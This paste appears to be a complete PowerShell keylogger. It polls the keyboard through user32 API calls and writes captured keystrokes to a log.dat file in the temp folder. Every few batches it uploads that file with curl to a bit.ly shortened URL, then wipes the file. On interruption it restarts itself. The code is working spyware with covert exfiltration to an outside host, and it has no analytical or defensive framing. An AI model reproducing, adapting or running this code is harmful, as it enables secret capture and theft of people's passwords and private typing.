· 4 years ago · Sep 09, 2021, 03:54 PM
1function run-key([Int]$send)
2{
3 $signatures = @'
4 [DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)]
5 public static extern short GetAsyncKeyState(int virtualKeyCode);
6 [DllImport("user32.dll", CharSet=CharSet.Auto)]
7 public static extern int GetKeyboardState(byte[] keystate);
8 [DllImport("user32.dll", CharSet=CharSet.Auto)]
9 public static extern int MapVirtualKey(uint uCode, int uMapType);
10 [DllImport("user32.dll", CharSet=CharSet.Auto)]
11 public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);
12'@
13 $API = Add-Type -MemberDefinition $signatures -Name 'Win32' -Namespace API -PassThru
14 [Int]$counter = 0
15 [Int]$end = 0
16 [String]$lista = ""
17 try
18 {
19 while ($end -lt 5) {
20 Start-Sleep -Milliseconds 40
21 for ($ascii = 9; $ascii -le 254; $ascii++) {
22 $state = $API::GetAsyncKeyState($ascii)
23 if ($state -eq -32767)
24 {
25 $null = [console]::CapsLock
26 $virtualKey = $API::MapVirtualKey($ascii, 3)
27 $kbstate = New-Object Byte[] 256
28 $checkkbstate = $API::GetKeyboardState($kbstate)
29 $mychar = New-Object -TypeName System.Text.StringBuilder
30 # translate virtual key
31 $success = $API::ToUnicode($ascii, $virtualKey, $kbstate, $mychar, $mychar.Capacity, 0)
32
33 if ($success)
34 {
35 # add key to logger file
36 $lista += $mychar
37 $counter++
38 if ($counter -ge 20)
39 {
40 $counter = 0
41 cmd.exe /c "echo $lista>>%temp%\log.dat"
42 $lista = ""
43 $send++
44 if ($send -ge 3)
45 {
46 $send = 0
47 cmd.exe /c "curl -T %temp%\log.dat -Ls https://bit.ly/3yPnegN"
48 cmd.exe /c "echo.>%temp%\log.dat"
49 }
50 }
51 if ($lista.endswith("9"))
52 {
53 $end++
54 if ($end -ge 5)
55 {
56 break
57 }
58 }
59 }
60 }
61 }
62 }
63 }
64 finally
65 {
66 if ($end -lt 5)
67 {
68 cmd.exe /c "echo $lista>>%temp%\log.dat"
69 $lista = ""
70 run-key $send
71 }
72 }
73}
74run-key 0